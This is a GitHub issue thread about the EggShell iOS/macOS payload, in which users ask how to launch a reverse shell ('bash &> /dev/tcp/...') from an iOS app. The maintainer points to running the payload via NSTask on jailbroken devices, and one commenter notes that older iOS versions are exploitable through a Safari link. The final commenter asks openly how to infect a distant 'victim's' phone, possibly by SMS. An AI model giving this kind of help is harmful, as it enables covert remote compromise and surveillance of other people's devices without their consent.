### ISSUE TITLE
Connect via iOS App

### ISSUE THREAD

**Issue by salamsalamhavji** [neoneggplant/EggShell#57]
Hi,
This is unique and best Payload. So thanks for you Lucas. But System is a function for MacOS. How to run "bash &> /dev/tcp/...." in iOS App?

Thanks for Help

**Comment by cemates** [comment]
iOS 9.3.3 and under are vulnerable just by simply clicking a link in Safari. so if you're running an upgraded version of iOS, unfortunately, you shall not do it.

**Comment by neoneggplant** [comment]
if you are jailbroken you can call NSTask and it will run the payload ,it is not specific to 9.3.3
https://stackoverflow.com/questions/17976289/executing-shell-commands-with-nstask-objective-c-cocoa

**Comment by salamsalamhavji** [comment]
Tnx man:)

**Comment by hakancelik** [comment]
Hi,
With Which techniques we can infect the payload? To embed in a IOS app is okey but than it is a bit hard to install this app our victims phone which victim far away from us. Is it work with sms? Or you can mention any other techniques? Than we can have access victim's phone who lives far away:) 

Thanks Lucas.
